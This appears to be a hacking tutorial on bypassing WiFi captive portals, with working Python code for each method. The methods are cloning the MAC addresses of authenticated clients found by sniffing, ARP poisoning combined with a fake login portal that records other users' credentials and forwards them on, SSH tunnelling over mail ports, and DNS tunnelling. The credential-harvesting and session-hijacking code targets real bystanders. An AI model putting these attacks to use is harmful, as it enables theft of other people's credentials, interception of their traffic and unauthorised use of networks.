
What to do if the wifi requires web authentication?

WiFi that requires authentication

Such a network is usually an open WiFi network: anyone can associate to it, but the first time you open a web page you are redirected to a mandatory authentication page (a captive portal), and you can only use the Internet after entering a valid username and password.

You run into captive portals of this kind everywhere in daily life: McDonald's, hospitals, airports, parks and so on.

Hack it!

The first thing to note is that, because it is an open WiFi network, you can connect to it effortlessly. The network then uses authentication to restrict Internet access to legitimate users, usually to prevent abuse: downloading pornographic content, using the network for illegal activities, and so on.

Regardless, once we are connected we sit on the same layer-2 segment as every other client, so we can scan all hosts on the network and sniff their traffic (unless the access point enforces client isolation, which most free hotspots do not).

There are several common methods for bypassing hotspot authentication; we introduce them one by one below.

1. MAC address forgery method

Open-network authentication usually works by linking the MAC address of your device to your credentials (account and password): once you have logged in, the gateway lets traffic from that MAC address through.

However, the MAC address of any device (laptops, smartphones and so on) is trivially changed, so this is not a robust or secure form of authentication.

The first thing we need to do is scan the whole network for other clients that are already connected. The fastest way is an ARP scan, which gives us a complete table of the IP addresses and MAC addresses of all connected devices.

Now we can try those MAC addresses one by one and see whether the corresponding client has already passed authentication.

To speed up the check, we can proceed as follows:

1. Detect whether a device is generating any traffic at all.

2. If it is, capture the traffic and check whether it is Internet traffic rather than local traffic.

If both conditions hold, we can be fairly sure that the client has passed the portal's authentication. Fairly, not completely: many portals redirect unauthenticated HTTP requests to the login page, so replies that appear to come from an Internet address on port 80 prove nothing, whereas an encrypted flow such as HTTPS that is actually carrying data is good evidence.

Sometimes this type of WiFi only offers free service for a limited time or data volume per user. Once the allowance is used up, we can keep using the network simply by switching to a random MAC address: the gateway sees a new device and starts a fresh allowance.
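The two checks above, plus the MAC switch, as an added example that is not part of the original article. It reads the text output of `tcpdump -e -n -i wlan0 ip` (the capture embedded below is constructed, not real, with 00:11:22:33:44:55 playing the gateway), flags clients that both send to Internet addresses and receive data back from them on a port other than 80 (the caveat from the paragraph above), and prints the Linux commands to adopt one of their addresses or a random one. The interface name and addresses are placeholders.

```python
"""Pick out clients that already passed the captive portal and clone one of them.

Added example (not from the original article). Input: the text output of
`tcpdump -e -n -i wlan0 ip`; the capture below is constructed, not real.
"""
import ipaddress
import random
import re
from collections import defaultdict

# Constructed sample capture. 00:11:22:33:44:55 is the hotspot gateway,
# aa:bb:cc:00:00:0x are other clients on the same WiFi.
SAMPLE_CAPTURE = """\
12:00:01.000001 aa:bb:cc:00:00:01 > 00:11:22:33:44:55, ethertype IPv4 (0x0800), length 74: 192.168.1.10.51234 > 93.184.216.34.443: Flags [S], seq 1, win 64240, length 0
12:00:01.000200 00:11:22:33:44:55 > aa:bb:cc:00:00:01, ethertype IPv4 (0x0800), length 74: 93.184.216.34.443 > 192.168.1.10.51234: Flags [S.], seq 2, ack 2, win 65535, length 0
12:00:01.010000 00:11:22:33:44:55 > aa:bb:cc:00:00:01, ethertype IPv4 (0x0800), length 1514: 93.184.216.34.443 > 192.168.1.10.51234: Flags [P.], seq 1:1449, ack 518, win 501, length 1448
12:00:02.000001 aa:bb:cc:00:00:02 > 00:11:22:33:44:55, ethertype IPv4 (0x0800), length 74: 192.168.1.11.40000 > 104.16.0.10.80: Flags [S], seq 1, win 64240, length 0
12:00:02.000200 00:11:22:33:44:55 > aa:bb:cc:00:00:02, ethertype IPv4 (0x0800), length 366: 104.16.0.10.80 > 192.168.1.11.40000: Flags [P.], seq 1:301, ack 100, win 501, length 300
12:00:03.000001 aa:bb:cc:00:00:03 > 00:11:22:33:44:55, ethertype IPv4 (0x0800), length 60: 192.168.1.12.137 > 192.168.1.255.137: UDP, length 50
"""

# One tcpdump -e line: MACs, IPv4 addresses with ports, and the trailing payload length.
LINE_RE = re.compile(
    r"^\S+ (?P<smac>[0-9a-f:]{17}) > (?P<dmac>[0-9a-f:]{17}), "
    r"ethertype IPv4 \(0x0800\), length \d+: "
    r"(?P<sip>[\d.]+)\.(?P<sport>\d+) > (?P<dip>[\d.]+)\.(?P<dport>\d+): "
    r".*length (?P<plen>\d+)$"
)


def is_lan(ip):
    """Addresses that never leave the hotspot: RFC1918, link-local, multicast, ..."""
    return ip.is_private or ip.is_link_local or ip.is_multicast or ip.is_loopback or ip.is_reserved


def find_authenticated_clients(capture_text):
    """Heuristic from the article: a client counts as authenticated when
    (1) it sends packets to Internet addresses and
    (2) it receives data-bearing packets back from Internet addresses.
    Condition (2) ignores source port 80: a portal that DNATs HTTP to its login
    page produces replies that look as if they came from the Internet address."""
    out_to_internet = defaultdict(int)
    data_from_internet = defaultdict(int)
    for line in capture_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        sip, dip = ipaddress.ip_address(m["sip"]), ipaddress.ip_address(m["dip"])
        if is_lan(sip) and not is_lan(dip):
            out_to_internet[m["smac"]] += 1
        elif not is_lan(sip) and is_lan(dip) and int(m["plen"]) > 0 and m["sport"] != "80":
            data_from_internet[m["dmac"]] += 1
    return sorted(mac for mac in out_to_internet if data_from_internet[mac] > 0)


def spoof_commands(iface, mac):
    """Linux commands to take over a MAC address (run as root). While the real
    owner is still active you both share one address and the gateway's ARP and
    bridge tables flap, so prefer a client that has gone quiet."""
    return [
        f"ip link set dev {iface} down",
        f"ip link set dev {iface} address {mac}",
        f"ip link set dev {iface} up",
    ]


def random_mac():
    """Fresh locally-administered unicast MAC for the 'allowance used up' case:
    bit 1 of the first octet set (locally administered), bit 0 clear (unicast)."""
    octets = [random.getrandbits(8) for _ in range(6)]
    octets[0] = (octets[0] | 0x02) & 0xFE
    return ":".join(f"{o:02x}" for o in octets)


if __name__ == "__main__":
    for mac in find_authenticated_clients(SAMPLE_CAPTURE):
        print("candidate:", mac)
        print("\n".join(spoof_commands("wlan0", mac)))
    print("or a random MAC:", random_mac())
```

On the constructed capture only aa:bb:cc:00:00:01 qualifies: it exchanged a data-carrying HTTPS segment with an Internet host, while aa:bb:cc:00:00:02 only got a port-80 reply (which could just be the portal's redirect) and aa:bb:cc:00:00:03 only sent a LAN broadcast.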

2. Forged authentication page

This method is essentially phishing: we create a fake authentication page, force normal users onto it to "log in", and steal their Internet credentials.

As noted above, all traffic on an open WiFi network is unencrypted plaintext, so we can intercept and tamper with it at will. Although the authentication page is sometimes served over HTTPS, it almost always uses a custom certificate (often self-signed, so users are used to clicking through a warning), which makes a fake page with its own certificate far less conspicuous than it should be.

To build the fake portal we need to download the genuine authentication page. Use any tool you like to fetch it, then edit the page so that it records the credentials users enter. Once we have saved them, we forward the user's request on to the real authentication page so that the user is actually authenticated and notices nothing.

But the question is, how do we force users to log in to our fake authentication portal instead of the original one?

The simplest method is an ARP poisoning attack against all clients: we announce that the IP address of the authentication portal now belongs to our own MAC address, so clients send their portal traffic to us.

The following picture can explain this method well:

We run a web server and host the fake authentication page on it.

At this point the setup is complete; we just wait for usernames and passwords to arrive.
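The two pieces of this setup, as an added example that is not code from the original article: the unsolicited ARP reply that repoints the portal's IP address to our MAC (built by hand so the frame layout is visible), and a minimal fake portal that records the submitted form and then replays it to the real portal so the victim still gets logged in. All MACs, IPs and the real portal URL are placeholders.

```python
"""Poisoned ARP reply + fake portal that records credentials and passes users on.

Added example (not from the original article). MACs, IPs and REAL_PORTAL_URL
are placeholders; the ARP frame is packed by hand so the layout is visible.
"""
import html
import socket
import struct
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

REAL_PORTAL_URL = "http://10.0.0.1/login"   # assumed address of the genuine portal
CAPTURED = []                                 # credentials harvested so far


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def build_arp_reply(victim_mac, victim_ip, portal_ip, attacker_mac):
    """Unsolicited ARP 'is-at' reply telling the victim that portal_ip lives at
    attacker_mac. Ethernet header (14 bytes) + ARP body (28 bytes) = 42 bytes.
    Re-send every few seconds: the victim's ARP cache entry expires."""
    eth = mac_bytes(victim_mac) + mac_bytes(attacker_mac) + b"\x08\x06"  # dst, src, type=ARP
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)  # htype Ethernet, ptype IPv4, hlen, plen, op=reply
    arp += mac_bytes(attacker_mac) + socket.inet_aton(portal_ip)   # sender: "portal_ip is at attacker_mac"
    arp += mac_bytes(victim_mac) + socket.inet_aton(victim_ip)     # target: the victim
    return eth + arp


def parse_arp(frame):
    """Decode the frame above: what the victim's kernel sees and caches."""
    (op,) = struct.unpack("!H", frame[20:22])
    return {
        "op": op,
        "sender_mac": frame[22:28].hex(":"),
        "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": frame[32:38].hex(":"),
        "target_ip": socket.inet_ntoa(frame[38:42]),
    }


def send_frame(iface, frame):
    """Linux only, needs root: put the raw frame on the wire."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


LOGIN_FORM = b"""<html><body><form method="POST" action="/login">
Username <input name="username"> Password <input name="password" type="password">
<input type="submit" value="Log in"></form></body></html>"""


def record_credentials(body):
    """Pull username/password out of a form body and store them."""
    fields = parse_qs(body)
    creds = {k: fields[k][0] for k in ("username", "password") if k in fields}
    if creds:
        CAPTURED.append(creds)
    return creds


def forward_page(creds):
    """Self-submitting form that replays the credentials to the real portal,
    so the victim is actually logged in and sees nothing unusual."""
    inputs = "".join(
        f'<input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}">'
        for k, v in creds.items()
    )
    return (f'<html><body onload="document.forms[0].submit()">'
            f'<form method="POST" action="{REAL_PORTAL_URL}">{inputs}</form>'
            f'</body></html>').encode()


class FakePortal(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(LOGIN_FORM)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        creds = record_credentials(self.rfile.read(length).decode())
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(forward_page(creds))


if __name__ == "__main__":
    frame = build_arp_reply("aa:bb:cc:00:00:01", "192.168.1.10", "192.168.1.1", "de:ad:be:ef:00:01")
    print(parse_arp(frame))
    # send_frame("wlan0", frame)   # Linux, as root, in a loop
    HTTPServer(("0.0.0.0", 80), FakePortal).serve_forever()   # port 80 needs root
```

Because the poisoned clients now send everything addressed to the portal's IP to us, our machine must also forward the traffic it is not interested in (or enable IP forwarding) so that the clients' connectivity does not visibly break.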

3. Use "Forgot Password"

This method is very simple. Some authenticated WiFi hotspots offer a password-reset service for when you forget your password.

Usually this works through your mobile phone number: a new password is sent by SMS to the number you enter. Quite often, however, the new password is sent by email instead.

If that is the case, the hotspot most likely lets you connect a mail client to your IMAP/POP mail server before authenticating, which already means you can use their network for free to read your mail. More generally, they usually do not check whether the traffic you generate is really IMAP or POP (mainly because it is encrypted, so they filter by port only; a gateway that inspected the first bytes of each connection could tell an SSH banner from a TLS handshake, but most hotspots do not).

So you can run an SSH server on your VPS listening on port 995 or 993, the default ports for POP3 over TLS and IMAP over TLS respectively, and open an SSH tunnel through it to proxy your web browsing.
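An added example (not from the original article) that checks whether the hotspot really passes those ports through unchanged and then opens the tunnel. It connects to your own VPS on the mail ports and classifies whatever the far end says first: an SSH server speaks first with its banner, a TLS-wrapped mail server waits for the client and stays silent, and an HTTP reply means the portal intercepted the connection. `VPS_HOST` and `VPS_USER` are placeholders, and the VPS's sshd is assumed to already listen on 993 (an extra `Port 993` line in sshd_config alongside `Port 22`).

```python
"""Check which 'mail' ports the hotspot lets through, then tunnel SSH over one.

Added example (not from the original article). VPS_HOST/VPS_USER are
placeholders for your own server, which must already run sshd on the probed port.
"""
import socket
import subprocess

VPS_HOST = "vps.example.net"          # assumption: your VPS
VPS_USER = "user"                     # assumption
MAIL_PORTS = (993, 995, 143, 110)     # IMAPS, POP3S, IMAP, POP3


def classify_banner(data):
    """Who answered first? SSH and plaintext IMAP/POP servers greet the client;
    a TLS server waits for the ClientHello, so silence on 993/995 is what real
    mail looks like, and an SSH banner means the port is passed through unfiltered."""
    if data.startswith(b"SSH-"):
        return "ssh"
    if data.startswith(b"* OK"):
        return "imap"
    if data.startswith(b"+OK"):
        return "pop3"
    if data.startswith(b"HTTP/"):
        return "http (portal intercepting)"
    return "silent" if not data else "unknown"


def probe(host, ports, timeout=3.0):
    """TCP-connect to each port and read whatever the far end sends first."""
    results = {}
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.settimeout(timeout)
                try:
                    banner = s.recv(64)
                except socket.timeout:
                    banner = b""
            results[port] = classify_banner(banner)
        except OSError as exc:
            results[port] = f"blocked ({exc.__class__.__name__})"
    return results


def ssh_socks_command(host, user, port, socks_port=1080):
    """ssh -D opens a local SOCKS5 proxy; point the browser at 127.0.0.1:socks_port."""
    return ["ssh", "-N", "-D", f"127.0.0.1:{socks_port}", "-p", str(port), f"{user}@{host}"]


if __name__ == "__main__":
    for port, verdict in probe(VPS_HOST, MAIL_PORTS).items():
        print(f"{port}: {verdict}")
    # Once 993 reports "ssh", run the tunnel and set the browser's SOCKS proxy to 127.0.0.1:1080.
    subprocess.run(ssh_socks_command(VPS_HOST, VPS_USER, 993))
```

Use a SOCKS proxy mode that resolves hostnames on the far side (Firefox's "Proxy DNS when using SOCKS v5", or `curl --socks5-hostname`), otherwise your DNS queries still go to the hotspot.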

4. DNS tunnel method

Most of the time, WiFi hotspots let you perform DNS queries even before you authenticate. They generally use their own DNS servers, and often they also allow queries to external DNS servers. Even when they do not, the hotspot's own resolver normally forwards recursive queries for arbitrary domains to the Internet, and that alone is enough for a DNS tunnel.

Iodine is a DNS tunnelling project created some years ago: it builds an IP tunnel over the DNS protocol between your client and a server you control (the authoritative name server for a subdomain you own), and you can then route Internet traffic through it.

This is somewhat similar to using a VPN to connect to your office network. Once the tunnel is up, you can again run an SSH tunnel through it to your server and proxy through that, which gives you an encrypted, secure channel to the Internet. The DNS tunnel itself is slow and does not encrypt your data, so the SSH layer on top is not optional.
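How data actually rides inside DNS queries, as an added example that is not from the original article and is not iodine's own wire format (which is more elaborate): upstream bytes are base32-encoded into labels of a query name under a domain delegated to our server, packed into a standard DNS query, and sent to the hotspot's resolver, which recurses to our server on our behalf. `TUNNEL_DOMAIN` and the resolver address are placeholders; the server side only needs to pull the question name back out.

```python
"""How data rides inside DNS queries: a minimal upstream encoder/decoder plus
the raw DNS packet that carries it through the hotspot's resolver.

Added example (not from the original article and not iodine's wire format).
TUNNEL_DOMAIN is a placeholder whose NS record must point at the server we run.
"""
import base64
import socket
import struct

TUNNEL_DOMAIN = "t.example.com"   # assumption: delegated to our tunnel server
MAX_LABEL = 63                    # DNS limit per label
MAX_NAME = 253                    # DNS limit per name


def encode_query(payload, seq):
    """Chunk -> query name  s<seq>.<base32 labels>.t.example.com
    Base32 because names are case-insensitive and limited to letters, digits and '-'."""
    b32 = base64.b32encode(payload).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    name = ".".join([f"s{seq}", *labels, TUNNEL_DOMAIN])
    if len(name) > MAX_NAME:
        raise ValueError("chunk too large for one query")
    return name


def decode_query(name):
    """Server side: query name -> (seq, payload bytes)."""
    suffix = TUNNEL_DOMAIN.split(".")
    parts = name.split(".")
    if parts[-len(suffix):] != suffix:
        raise ValueError("not a tunnel query")
    seq = int(parts[0][1:])
    b32 = "".join(parts[1:-len(suffix)]).upper()
    b32 += "=" * (-len(b32) % 8)   # restore the padding stripped on the way out
    return seq, base64.b32decode(b32)


def chunk_upstream(data, chunk=100):
    """Split a byte stream into query names; 100 bytes -> 160 base32 chars -> 3 labels."""
    return [encode_query(data[i:i + chunk], n) for n, i in enumerate(range(0, len(data), chunk))]


def build_dns_query(name, txid, qtype=16):
    """Ordinary DNS query with RD set. qtype 16 = TXT: the tunnel server puts the
    downstream data in the answer record, so the reply carries data back."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)


def extract_qname(packet):
    """What the tunnel server reads back out of the question section."""
    pos, labels = 12, []
    while packet[pos] != 0:
        n = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + n].decode())
        pos += 1 + n
    return ".".join(labels)


def send_query(name, resolver, txid=0x1234):
    """Send via the hotspot's own resolver: we never contact the Internet directly,
    the resolver does the recursion to our authoritative server for us."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(3)
        s.sendto(build_dns_query(name, txid), (resolver, 53))
        return s.recv(4096)


if __name__ == "__main__":
    for name in chunk_upstream(b"GET / HTTP/1.0\r\nHost: example.org\r\n\r\n"):
        print(name)
        print(decode_query(extract_qname(build_dns_query(name, 1))))
        # send_query(name, "192.168.1.1")   # the hotspot's resolver, placeholder
```

The shape of these names (many long, high-entropy labels under one domain, at a high query rate) is also exactly what a network defender looks for when hunting DNS tunnels.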